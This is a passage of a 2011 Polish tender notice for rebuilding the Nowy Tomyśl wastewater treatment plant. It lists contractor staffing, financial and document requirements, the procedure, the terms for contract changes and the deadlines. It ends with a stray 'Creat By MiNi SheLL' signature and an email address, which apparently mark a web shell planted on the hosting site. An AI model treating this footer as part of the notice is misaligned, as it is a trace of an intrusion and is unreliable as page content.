- znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

Wszystkie wymagane wyżej terminy należy liczyć od daty składania ofert w niniejszym postępowaniu.
Wskazany powyżej Kluczowy Personel nie wyczerpuje wymagań do rzetelnego wypełnienia zobowiązań Wykonawcy i winien być traktowany jako minimalne wymogi Zamawiającego.
a)	oświadczenie na temat średnio rocznego zatrudnienia pracowników w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w wysokości min. 40 zatrudnionych w każdym kolejnym roku sporządzone według wzoru stanowiącego Załącznik nr 3  do niniejszej SIWZ.
b)	oświadczenie na temat średnio rocznej liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w wysokości min. 7 osób w każdym kolejnym roku sporządzone według wzoru stanowiącego Załącznik nr 4 do niniejszej SIWZ.

c)	wykaz osób (kadra), które będą uczestniczyć w wykonywaniu niniejszego zamówienia wraz z informacją o podstawie do dysponowania osobami wskazanymi do wykonywania niniejszego zamówienia, sporządzony według wzoru stanowiącego załącznik nr 5a do niniejszej SIWZ 

d) informacje zawodowe na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia osób wskazanych do wykonywania niniejszego zamówienia, a także zakresu wykonywanych przez nie czynności - rozumiane jako informacja o której mowa w pa. 1 ust. 1 pkt 6 Rozporządzenia Rady Ministrów z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 226, poz. 1817 ze zmianami). Zalecany przez Zamawiającego wzór stanowi załącznik nr 5b do niniejszej SIWZ
e) do ww dokumentów należy dołączyć oświadczenie, że wskazane osoby, które będą uczestniczyć w wykonywaniu zamówienia, a mianowicie: Ekspert Nr 2, Ekspert Nr 3, Ekspert Nr 4, Ekspert Nr 5, Ekspert Nr 6, Ekspert Nr 7, Ekspert Nr 8, Ekspert Nr 9, posiadają wymagane uprawnienia i są wpisani na listę członków właściwej izby samorządu zawodowego. Uprawnienia budowlane winny być zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28-04-2006 w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. nr 83, poz. 578) lub z wcześniej wydanymi przepisami. Zalecany przez Zamawiającego wzór stanowi załącznik nr 5c do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	Wykonawca osiągnął w ciągu ostatnich trzech lat obrotowych, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie, średnie roczne obroty (tzn. średnia arytmetyczna obrotów rozumianych jako przychód netto ze sprzedaży z ostatnich trzech lat) w kwocie co najmniej  30 000 000 PLN. 

b.	Wykonawca posiada na rachunku bankowym lub spółdzielczej kasy oszczędnościowo-kredytowej środki finansowe w wysokości co najmniej 8.000.000 PLN lub posiada zdolność kredytową w wysokości, co najmniej 8.000.000 PLN.  
c.	Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związane z przedmiotem zamówienia w wysokości co najmniej 6.000.000 PLN na jedno i wszystkie zdarzenia. 

(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa):

a)	część sprawozdania finansowego w postaci rachunku zysków i strat, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanej części sprawozdania w postaci rachunku zysków i strat a w przypadku Wykonawcy nie zobowiązanego do sporządzania sprawozdania finansowego inne dokumenty określające przychody netto ze sprzedaży za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, wykazując, że Wykonawca osiągnął w każdym z ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, średnioroczne przychody netto ze sprzedaży co najmniej wartości 30 000 000 PLN
(tzn. średnia arytmetyczna  obrotów rozumianych jako przychód netto ze sprzedaży z ostatnich trzech lat).
	(w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku).

b)	informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości (co najmniej 8.000.000 PLN) lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości (co najmniej 8.000.000 PLN), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości.

c.	opłaconą polisę, a w przypadku jej braku inny dokument, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 6.000.000PLN na jedno i wszystkie zdarzenia. Polisa musi być ważna, co najmniej na dzień składania ofert.

Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o braku podstaw do wykluczenia wynikających z art.24 ust.1 Ustawy Pzp,  do niniejszej SIWZ, (w przypadku wspólnego ubiegania się o udzielenie zamówienia dwóch lub więcej Wykonawców, oświadczenie musi być złożone przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub przez Pełnomocnika ustanowionego do reprezentowania ich w niniejszym postępowaniu, w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia). 

Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 44 ustawy pzp,   (w przypadku wspólnego ubiegania się o udzielenie zamówienia dwóch lub więcej Wykonawców, oświadczenie musi być złożone przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub przez Pełnomocnika ustanowionego do reprezentowania ich w niniejszym postępowaniu, w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia).



Dokumenty, o których mowa w pkt 10.6.1.a., 10.6.1.c. oraz 10.6.2. powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Natomiast dokument, o którym mowa powyżej w pkt.10.6.1.b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

10.8.	Stosownie do treści § 4 ust. 3 powołanego powyżej rozporządzenia Prezesa 
Rady Ministrów, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt.10.6., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt 10.7. SIWZ znajdują odpowiednie zastosowanie.

10.9.	W przypadku złożenia przez Wykonawców dokumentów zawierających dane 
w innych walutach niż określone w pkt.10.4. Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego (NBP) w dniu ukazania się ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej, lub średni kurs NBP z pierwszego dnia roboczego poprzedzającego dzień ukazania się ogłoszenia w Dzienniku Urzędowym Unii Europejskiej - jeżeli dniem ukazania się ogłoszenia jest sobota. Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych. 

10.10.	Dokumenty sporządzone w języku obcym należy złożyć wraz z 
tłumaczeniem na język polski poświadczonym przez Wykonawcę.  Dokumenty załączone do oferty winny być podpisane lub, w przypadku kserokopii, potwierdzone za zgodność z oryginałem przez osobę-y uprawnioną-e do zaciągania zobowiązań w imieniu wykonawcy lub jego pełnomocnika. 

11. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. 

1) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (konsorcjum) powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 i 10 SIWZ. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokument ustanawiający Pełnomocnika (pełnomocnictwo) powinien być dołączony do oferty.
2) Pełnomocnictwo powinno:
1)	Jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania,
2)	Wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia,
3)	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem ze skutkiem dla wszystkich Wykonawców składających ofertę wspólną.

4)	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przekazać Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia: 
1)	sposób ich współdziałania,
2)	zakres prac powierzonych do wykonania każdemu z nich,
3)	solidarną odpowiedzialność za wykonanie zamówienia,
4)	zaleca się , aby porozumienie zawierało wskazanie, że jeden z Wykonawców jest upoważniony do zaciągania zobowiązań i do przyjmowania instrukcji na rzecz i w imieniu wszystkich wykonawców razem i każdego z osobna oraz przyjmowania płatności od Zamawiającego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian postanowień zawartej umowy w stosunku do treści oferty ,na podstawie której dokonano wyboru Wykonawcy w następujących sytuacjach:

1) Zmiana terminu realizacji umowy:
a) jeżeli zmiana jest konieczna z powodu działania siły wyższej tj. tzn. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było uniknąć w szczególności niesprzyjających warunków atmosferycznych i klęsk żywiołowych ,katastrofy budowlanej uniemożliwiających terminowe wykonanie przedmiotu umowy
b) jeżeli Wykonawca złoży wniosek o skrócenie terminu wykonania umowy a zmiana jest korzystna dla Zamawiającego
c) jeżeli wystąpią znacząco odmienne od przyjętych w Programie funkcjonalno-użytkowym warunki geologiczne ( kategoria gruntu, kurzawka itp. ) uniemożliwiające terminowe wykonanie przedmiotu umowy ,
d) jeżeli wystąpią znacząco odmienne od przyjętych w programie funkcjonalno-użytkowym warunki terenowe w szczególności podziemne sieci , instalacje ,
urządzenia lub niezinwentaryzowane obiekty budowlane itp. uniemożliwiające terminowe wykonanie przedmiotu umowy ,
e) jeżeli zmiany będą następstwem działania organów sądowych lub administracyjnych , w szczególności dotyczących :
- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji , zezwoleń itp.,
- wydania postanowienia o wstrzymaniu robót budowlanych w przypadku , o którym mowa w art. 50 ust. 1 ustawy z dnia z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U. 2006 r. Nr 156 poz. 1118 z późn.zm.)
-konieczności uzyskania wyroku sądowego , lub innego orzeczenia sądu lub organu administracyjnego , którego konieczności nie przewidziano przy zawieraniu umowy ,
f)  w przypadku zaistnienia okoliczności nie otrzymania przez Zamawiającego środków finansowych od osób trzecich, tj. w przypadku braku dofinansowania inwestycji ze strony Gminy Nowy Tomyśl lub w przypadku nie otrzymania kredytu, strony mogą zgodzić się na przerwanie realizacji umowy, a po ich ustaniu podjąć realizację na warunkach płatniczych w niej określonych bez wzajemnego naliczania jakichkolwiek kar i odszkodowań. Termin ukończenia całości robót ulega wówczas przesunięciu o czas przerwy w realizacji umowy. Zgoda na przerwę w realizacji umowy musi być, pod rygorem nieważności, zawarta w formie pisemnej. Przerwa w realizacji nie może trwać dłużej, niż 6 miesięcy, po tym terminie Wykonawca może odstąpić od realizacji umowy. Te przyczyny odstąpienia od umowy strony traktować będą jako zdarzenia niezależne i niezawinione przez Zamawiającego, wobec czego nie będą rościć wobec siebie jakichkolwiek pretensji z tytułu kar umownych bądź odszkodowania. 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 5.1) a-e termin wykonania umowy może ulec odpowiedniemu przedłużeniu , nie dłużej jednak niż o okres trwania tych okoliczności

2) Zmiana sposobu wykonania umowy
a) zmiany technologiczne wywołane w szczególności:
- niedostępnością na rynku materiałów lub urządzeń wskazanych w ofercie, programie funkcjonalno-użytkowym, spowodowaną zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń ,
-pojawieniem się na rynku nowych materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy ,
- koniecznością zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych -technologicznych niż wskazane w ofercie , programie funkcjonalno-użytkowym) w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy ,
- wystąpieniem znacząco odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych ( kategoria gruntu, kurzawka itp.) skutkujących niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych ,
- koniecznością zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa .
b) zmiany osobowe 
- zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami , o których mowa w prawie budowlanym )
c) zmiany w organizacji wykonania przedmiotu umowy 
- zmiana szczegółowego harmonogramu wykonywania robót budowlanych bez zmiany ostatecznego terminu zakończenia realizacji przedmiotu umowy lub zmiana innych ustaleń dotyczących terminów spełniania świadczeń w ramach przedmiotu umowy ,
-zmiana zasad dokonywania odbiorów robót budowlanych jeżeli nie zmniejszy to zasad bezpieczeństwa i nie spowoduje zwiększenia kosztów odbiorów , które obciążałyby Zamawiającego
-zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy przy czym zmiana ta nie może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej realizacji przedmiotu umowy ,
3) Pozostałe zmiany
a) zmiana ustawowej stawki podatku VAT .W takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku ,
b) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze SIWZ ,
c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian umowy zawartej przez Zamawiającego o dofinansowanie Projektu pod nazwą . Kompleksowe zagospodarowanie ścieków w zlewni rzeki Obry - Gmina Nowy Tomyśl. Przebudowa i rozbudowa miejskiej oczyszczalni ścieków w Nowym Tomyślu lub wytycznych dotyczących realizacji tego Projektu,
d) wydłużenie okresu gwarancji o dowolny okres</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwik.nowytomysl.pl - przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Wodociagów i Kanalizacji w Nowym Tomyślu Spółka z o.o. 64-300 Nowy Tomyśl  ul. Targowa 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2011 godzina 12:00, miejsce: Przedsiębiorstwo Wodociagów i Kanalizacji w Nowym Tomyślu Spółka z o.o. 64-300 Nowy Tomyśl  ul. Targowa 8  -  Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Fundusz Spóności, Program Operacyjny Infrastruktura i Środowisko Oś. Priorytetowa I Gospodarka wodno - ściekowa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com